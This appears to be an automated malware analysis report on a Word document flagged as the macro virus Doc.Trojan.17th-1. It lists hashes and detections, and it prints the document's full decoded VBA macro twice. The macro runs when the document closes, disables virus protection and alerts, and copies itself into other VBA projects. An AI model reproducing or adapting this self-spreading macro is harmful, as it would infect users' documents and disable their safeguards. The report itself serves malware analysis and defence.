Office (OLE) malware analysis — malicious · 104a68cbb21b8a52

MALICIOUS

Office (OLE)

38.5 KB Created: 2004-05-13 22:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 317098c3ab217af82fed11181c0cd9a7 SHA-1: cb51257c8fd71c2b7dc64e9f24d00d1b75dd5c5f SHA-256: 104a68cbb21b8a522298220cb1563117b363411bcb0d789a09ab482557155bc3

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is an Office document containing VBA macros. The macro code attempts to disable virus protection and modify its own VBA project by setting the description to '17th'. This suggests an attempt to evade analysis or hide malicious functionality. The ClamAV detection 'Doc.Trojan.17th-1' further supports the malicious nature.

Heuristics 2

ClamAV: Doc.Trojan.17th-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.17th-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 833 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	833 bytes
SHA-256: `dfd0bd010f89456120c513576625645965aaf414bc342362a0075d38262bc45e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - 17th Private Sub Document_Close() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.DisplayAlerts = 0 Application.ScreenUpdating = 0 Application.EnableCancelKey = 0 Set Ј\ = VBE.VBProjects For Јd = 1 To Ј \ .Count If Ј\(Јd).Protection <> 1 And Ј\(Јd).Description <> "17th" Then Ј\(Јd).Description = "17th" Set Јo = Ј\(Јd).VBComponents(1).CodeModule Јo.DeleteLines 1, Јo.CountOfLines Јo.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17) End If: Next End Sub

SHA-256: dfd0bd010f89456120c513576625645965aaf414bc342362a0075d38262bc45e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'Copyright (C) 1998 by FlyShadow ~^^~ - 17th
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
Set Ј\ = VBE.VBProjects
For Јd = 1 To Ј \ .Count
If Ј\(Јd).Protection <> 1 And Ј\(Јd).Description <> "17th" Then
Ј\(Јd).Description = "17th"
Set Јo = Ј\(Јd).VBComponents(1).CodeModule
Јo.DeleteLines 1, Јo.CountOfLines
Јo.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17)
End If: Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.